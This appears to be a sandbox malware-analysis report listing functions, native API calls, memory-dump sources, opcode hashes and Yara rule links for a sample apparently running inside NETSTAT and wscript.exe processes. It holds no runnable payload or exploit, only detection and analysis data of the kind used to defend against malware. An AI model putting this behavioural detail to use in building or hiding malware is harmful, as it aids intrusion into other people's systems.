                                                                                                                                                      • Instruction ID: c011177c854942fe27223077973083519b6a4dc63b50108c81b980cb60551ff5
                                                                                                                                                      • Opcode Fuzzy Hash: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
                                                                                                                                                      • Instruction Fuzzy Hash: 82D0A7717503043BE710FAA49C07F2633CC5B45B40F494064FE48D73C3D964F9008161
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 007DD42F, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • SetErrorMode.KERNELBASE(00008003,?,?,007D7C83,?), ref: 007DD45B
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001C.00000002.30154030326.00000000007D0000.00000040.00020000.sdmp, Offset: 007D0000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_28_2_7d0000_NETSTAT.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ErrorMode
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2340568224-0
                                                                                                                                                      • Opcode ID: 72ea501ca32a20037376517925c6f4de5f815541c480a40789b399fa1f4469b1
                                                                                                                                                      • Instruction ID: e9d91b23e93f813d165839e52d8033ecd59ff76558604aaccbfdda4467b9d794
                                                                                                                                                      • Opcode Fuzzy Hash: 72ea501ca32a20037376517925c6f4de5f815541c480a40789b399fa1f4469b1
                                                                                                                                                      • Instruction Fuzzy Hash: F0D05E717402443AEB20EAB49C07F6A27945F56740F0940A8F949E73C3D964D5018620
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 03392B2A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001C.00000002.30161938949.0000000003320000.00000040.00000001.sdmp, Offset: 03320000, based on PE: true
                                                                                                                                                      • Associated: 0000001C.00000002.30164043056.0000000003449000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001C.00000002.30164124287.000000000344D000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_28_2_3320000_NETSTAT.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 29b5d4282d1d1b22fec1db9a243c46f2baae15703845b50a0f73b0ead1219243
                                                                                                                                                      • Instruction ID: 2038ca29abc1b35231e4177187babbd4e81f04af21c4df14a5a9f232c0e80b52
                                                                                                                                                      • Opcode Fuzzy Hash: 29b5d4282d1d1b22fec1db9a243c46f2baae15703845b50a0f73b0ead1219243
                                                                                                                                                      • Instruction Fuzzy Hash: C0B09B71D038C9D5EE15D7644F48B177E44A7D0701F15C456D2464641E8778C091F175
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Non-executed Functions

                                                                                                                                                      Function 03387550, Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Strings
                                                                                                                                                      • ExecuteOptions, xrefs: 033C44AB
                                                                                                                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 033C454D
                                                                                                                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 033C4530
                                                                                                                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 033C4507
                                                                                                                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 033C4460
                                                                                                                                                      • Execute=1, xrefs: 033C451E
                                                                                                                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 033C4592
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001C.00000002.30161938949.0000000003320000.00000040.00000001.sdmp, Offset: 03320000, based on PE: true
                                                                                                                                                      • Associated: 0000001C.00000002.30164043056.0000000003449000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001C.00000002.30164124287.000000000344D000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_28_2_3320000_NETSTAT.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                      • API String ID: 0-484625025
                                                                                                                                                      • Opcode ID: 247c9d5178cb08d8e984ba035372dfec294dd86595f0d28f549bb0488626a72e
                                                                                                                                                      • Instruction ID: 31b2b163d9a4e872957729f77984e111b36b79d8d076a4dbd44f153c39c4651b
                                                                                                                                                      • Opcode Fuzzy Hash: 247c9d5178cb08d8e984ba035372dfec294dd86595f0d28f549bb0488626a72e
                                                                                                                                                      • Instruction Fuzzy Hash: 92513935E00309AAEF10FFA5ECD5FADB3ADEF04700F2805A9D505AB181DB709E458B50
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 03359046, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001C.00000002.30161938949.0000000003320000.00000040.00000001.sdmp, Offset: 03320000, based on PE: true
                                                                                                                                                      • Associated: 0000001C.00000002.30164043056.0000000003449000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001C.00000002.30164124287.000000000344D000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_28_2_3320000_NETSTAT.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: $$@
                                                                                                                                                      • API String ID: 0-1194432280
                                                                                                                                                      • Opcode ID: fecbacbfbd0c30fd054ab370a3f8acd5d84aac3691272f64e564324db1481b09
                                                                                                                                                      • Instruction ID: c2a6702d3c44a9e18ef8705b589a334388171edb00a6261b73beb4190c7185a5
                                                                                                                                                      • Opcode Fuzzy Hash: fecbacbfbd0c30fd054ab370a3f8acd5d84aac3691272f64e564324db1481b09
                                                                                                                                                      • Instruction Fuzzy Hash: 3C814C76D00269DBDB35CB54CC84BEEB6B8AF48710F0445EAAA19F7640D7349E85CFA0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Analysis Process: wscript.exe PID: 380 Parent PID: 4528 wscript.exeCOMMON

                                                                                                                                                      Executed Functions

                                                                                                                                                      Function 007385E0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 418 7385e0-738631 call 7391e0 NtCreateFile
                                                                                                                                                      APIs
                                                                                                                                                      • NtCreateFile.NTDLL(00000060,00000000,.z`,00733BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00733BB7,007A002E,00000000,00000060,00000000,00000000), ref: 0073862D
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001D.00000002.30154231684.0000000000720000.00000040.00020000.sdmp, Offset: 00720000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_29_2_720000_wscript.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                      • String ID: .z`
                                                                                                                                                      • API String ID: 823142352-1441809116
                                                                                                                                                      • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                                                                      • Instruction ID: d19d6af74af39055195c82f599cd7374d28ec471a068160a9d2bd251dba4f824
                                                                                                                                                      • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                                                                      • Instruction Fuzzy Hash: 93F0B2B2204208ABCB08CF88DC85EEB77ADAF8C754F158248FA0D97241C630E811CBA4
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00738690, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36filenativeCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 421 738690-7386d9 call 7391e0 NtReadFile
                                                                                                                                                      APIs
                                                                                                                                                      • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,1:s,FFFFFFFF,?,r=s,?,00000000), ref: 007386D5
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001D.00000002.30154231684.0000000000720000.00000040.00020000.sdmp, Offset: 00720000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_29_2_720000_wscript.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FileRead
                                                                                                                                                      • String ID: 1:s
                                                                                                                                                      • API String ID: 2738559852-911059018
                                                                                                                                                      • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                                                                                      • Instruction ID: 8c55964345d10b4dd9ed0be2d4d7d3a6ea7c456cddee624d7a7a1888ac63805c
                                                                                                                                                      • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                                                                                      • Instruction Fuzzy Hash: F4F0A4B2200208ABDB14DF89DC85EEB77ADAF8C754F158248BA1DA7241D630E911CBA0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0073868D, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 33filenativeCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 424 73868d-7386a6 426 7386ac-7386d9 NtReadFile 424->426 427 7386a7 call 7391e0 424->427 427->426
                                                                                                                                                      APIs
                                                                                                                                                      • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,1:s,FFFFFFFF,?,r=s,?,00000000), ref: 007386D5
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001D.00000002.30154231684.0000000000720000.00000040.00020000.sdmp, Offset: 00720000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_29_2_720000_wscript.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FileRead
                                                                                                                                                      • String ID: 1:s
                                                                                                                                                      • API String ID: 2738559852-911059018
                                                                                                                                                      • Opcode ID: 894451518b03425b5f96cb665bb015821518830248b6bef362a5c2ab4153df95
                                                                                                                                                      • Instruction ID: 835f68fd3e5b6fc8c5b4014683d5801e0eacbc22091dd3d4b8d61bc4aafc0e0e
                                                                                                                                                      • Opcode Fuzzy Hash: 894451518b03425b5f96cb665bb015821518830248b6bef362a5c2ab4153df95
                                                                                                                                                      • Instruction Fuzzy Hash: 94F017B6204049ABCB04DF98D894CEB77ADBF8C354B158289FA1CA7202C630E855CBA0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0073870A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 23nativeCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 437 73870a-738726 438 73872c-738739 NtClose 437->438 439 738727 call 7391e0 437->439 439->438
                                                                                                                                                      APIs
                                                                                                                                                      • NtClose.NTDLL(P=s,?,?,00733D50,00000000,FFFFFFFF), ref: 00738735
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001D.00000002.30154231684.0000000000720000.00000040.00020000.sdmp, Offset: 00720000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_29_2_720000_wscript.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Close
                                                                                                                                                      • String ID: P=s
                                                                                                                                                      • API String ID: 3535843008-806985626
                                                                                                                                                      • Opcode ID: 018cb176b172d783d48d9f0d354cb53a4ba3811f890f0fcac36f657c00b585a6
                                                                                                                                                      • Instruction ID: 5aeec686427554ab25ab07a81bbc1d5a2508177955f856a3090e0c92ee3bf669
                                                                                                                                                      • Opcode Fuzzy Hash: 018cb176b172d783d48d9f0d354cb53a4ba3811f890f0fcac36f657c00b585a6
                                                                                                                                                      • Instruction Fuzzy Hash: 89E08C31600214AFDB20DFA4CC8AEEB7B6AEF44360F144159FA09EB682C670E610CBD0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00738710, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20nativeCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 440 738710-738739 call 7391e0 NtClose
                                                                                                                                                      APIs
                                                                                                                                                      • NtClose.NTDLL(P=s,?,?,00733D50,00000000,FFFFFFFF), ref: 00738735
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001D.00000002.30154231684.0000000000720000.00000040.00020000.sdmp, Offset: 00720000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_29_2_720000_wscript.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Close
                                                                                                                                                      • String ID: P=s
                                                                                                                                                      • API String ID: 3535843008-806985626
                                                                                                                                                      • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                                                                                      • Instruction ID: 5db08edaed4a102620ef9b332ee0905ec1b96eb4c0d8ac4e0e8c23025d57ebcf
                                                                                                                                                      • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                                                                                      • Instruction Fuzzy Hash: 46D01275600214ABD710EB98CC49E97775CEF44750F154455BA185B242C570F600C6E0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 007387C0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 550 7387c0-7387d6 551 7387dc-7387fd NtAllocateVirtualMemory 550->551 552 7387d7 call 7391e0 550->552 552->551
                                                                                                                                                      APIs
                                                                                                                                                      • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00722D11,00002000,00003000,00000004), ref: 007387F9
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001D.00000002.30154231684.0000000000720000.00000040.00020000.sdmp, Offset: 00720000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_29_2_720000_wscript.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AllocateMemoryVirtual
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2167126740-0
                                                                                                                                                      • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                                                                                      • Instruction ID: 3afbc1f45b2214fb6a2ba29ce3578a51445fee366aa91a2dc5556b83d3113e43
                                                                                                                                                      • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                                                                                      • Instruction Fuzzy Hash: 2CF015B2200208ABDB14DF89CC85EAB77ADAF88750F118148FE08A7241C630F910CBA0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 007387C2, Relevance: 1.5, APIs: 1, Instructions: 29memorynativeCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 553 7387c2-7387fd call 7391e0 NtAllocateVirtualMemory
                                                                                                                                                      APIs
                                                                                                                                                      • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00722D11,00002000,00003000,00000004), ref: 007387F9
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001D.00000002.30154231684.0000000000720000.00000040.00020000.sdmp, Offset: 00720000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_29_2_720000_wscript.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AllocateMemoryVirtual
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2167126740-0
                                                                                                                                                      • Opcode ID: b7b15b99fa607431c14642596bc06a23face6b8274340ec77040ea26b9abdcb3
                                                                                                                                                      • Instruction ID: c8eeaa63d8778feb5f695c5eaf28dadd4bedc44049eae8413c7944b46e53f329
                                                                                                                                                      • Opcode Fuzzy Hash: b7b15b99fa607431c14642596bc06a23face6b8274340ec77040ea26b9abdcb3
                                                                                                                                                      • Instruction Fuzzy Hash: DBF015B2200108AFDB14DF88CC84EEB77A9AF88350F118248FA08A7241C630E911CBA0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 04A52C30, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001D.00000002.30163629230.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                      • Associated: 0000001D.00000002.30165670715.0000000004B09000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001D.00000002.30165732579.0000000004B0D000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_29_2_49e0000_wscript.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 5db8d23e68074f3bb5bb20dd342b069f07a818d99dccd0e603d45a3041c126a3
                                                                                                                                                      • Instruction ID: b6e7ad5d21a08a09f4da4efacfbec73581f0dd944b70c9380afe9e0e205d9d23
                                                                                                                                                      • Opcode Fuzzy Hash: 5db8d23e68074f3bb5bb20dd342b069f07a818d99dccd0e603d45a3041c126a3
                                                                                                                                                      • Instruction Fuzzy Hash: A190022921300002F5C07558550860A00098BD128AF91D81DA1056558CC929D8696322
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 04A52DC0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001D.00000002.30163629230.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                      • Associated: 0000001D.00000002.30165670715.0000000004B09000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001D.00000002.30165732579.0000000004B0D000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_29_2_49e0000_wscript.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 3b6390daac34041f6a0c78738e797304d3724ad38736179b72b494dd92040488
                                                                                                                                                      • Instruction ID: 63212cfe28b4c107d238a630bd8e3e0f74454ff03ffc5fb30f47cd7437ed04cf
                                                                                                                                                      • Opcode Fuzzy Hash: 3b6390daac34041f6a0c78738e797304d3724ad38736179b72b494dd92040488
                                                                                                                                                      • Instruction Fuzzy Hash: 3C90027120200402F5807558450474600098BD0389F51C419A60A5554EC66DDDD57666
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 04A52D10, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001D.00000002.30163629230.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                      • Associated: 0000001D.00000002.30165670715.0000000004B09000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001D.00000002.30165732579.0000000004B0D000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_29_2_49e0000_wscript.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 5e9b0dfde5c8b8508986420deb64e3d8d086e1005af755cb8605fc89c7192f40
                                                                                                                                                      • Instruction ID: 185fcde8bf430265bf795a3099cfbe982b98ca187c340b7ae608a506be3feb74
                                                                                                                                                      • Opcode Fuzzy Hash: 5e9b0dfde5c8b8508986420deb64e3d8d086e1005af755cb8605fc89c7192f40
                                                                                                                                                      • Instruction Fuzzy Hash: F890023120200413F55175584604707000D8BD02C9F91C81AA1465558DD66AD952B122
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 04A52E50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001D.00000002.30163629230.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                      • Associated: 0000001D.00000002.30165670715.0000000004B09000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001D.00000002.30165732579.0000000004B0D000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_29_2_49e0000_wscript.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 58db505fbaed9ff7de2e6d25212d3ff0221f087a9c613ac80e4df384d803419d
                                                                                                                                                      • Instruction ID: b73b54ee13abf3022a76859989b4fee46e519d9e30e7b724f3b111caac896aac
                                                                                                                                                      • Opcode Fuzzy Hash: 58db505fbaed9ff7de2e6d25212d3ff0221f087a9c613ac80e4df384d803419d
                                                                                                                                                      • Instruction Fuzzy Hash: 4290026134200442F54075584514B060009CBE1389F51C41DE20A5554DC62DDC527127
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 04A52F00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001D.00000002.30163629230.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                      • Associated: 0000001D.00000002.30165670715.0000000004B09000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001D.00000002.30165732579.0000000004B0D000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_29_2_49e0000_wscript.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 2bb4b2e6b85b09b814cbcb1d3be095939f731dec21aec078d4994881b9c42210
                                                                                                                                                      • Instruction ID: 1a62f28d92a7a63fb5e0fdbf9dda703db3f568b610e9a729ef9b759d206eb150
                                                                                                                                                      • Opcode Fuzzy Hash: 2bb4b2e6b85b09b814cbcb1d3be095939f731dec21aec078d4994881b9c42210
                                                                                                                                                      • Instruction Fuzzy Hash: A190022121280042F64079684D14B0700098BD038BF51C51DA1195554CC929D8616522
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 04A529F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001D.00000002.30163629230.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                      • Associated: 0000001D.00000002.30165670715.0000000004B09000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001D.00000002.30165732579.0000000004B0D000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_29_2_49e0000_wscript.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 3b4d0bbf90b040870e65c73a1ac25c31a5237cdc3a5e661033972c8148ca9b1d
                                                                                                                                                      • Instruction ID: 76cf038e62f0be257a477f64d7080486541a2c7e76f61e6845ed837a8a64890a
                                                                                                                                                      • Opcode Fuzzy Hash: 3b4d0bbf90b040870e65c73a1ac25c31a5237cdc3a5e661033972c8148ca9b1d
                                                                                                                                                      • Instruction Fuzzy Hash: 16900225212000032545B9580704507004A8BD53D9351C429F2056550CD635D8616122
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 04A52A80, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001D.00000002.30163629230.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                      • Associated: 0000001D.00000002.30165670715.0000000004B09000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001D.00000002.30165732579.0000000004B0D000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_29_2_49e0000_wscript.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: f33f8918e518a15b8f7602cb7ed879f73c96a798d70575ffc0aed2d22793fb7f
                                                                                                                                                      • Instruction ID: 45721f64c7c0f1e2744e11c70cd30253531a2083a6aa9cffb69c37d5488d0e96
                                                                                                                                                      • Opcode Fuzzy Hash: f33f8918e518a15b8f7602cb7ed879f73c96a798d70575ffc0aed2d22793fb7f
                                                                                                                                                      • Instruction Fuzzy Hash: DE90026120300003654575584514616400E8BE0289B51C429E2055590DC539D8917126
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 04A52AC0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001D.00000002.30163629230.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                      • Associated: 0000001D.00000002.30165670715.0000000004B09000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001D.00000002.30165732579.0000000004B0D000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_29_2_49e0000_wscript.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
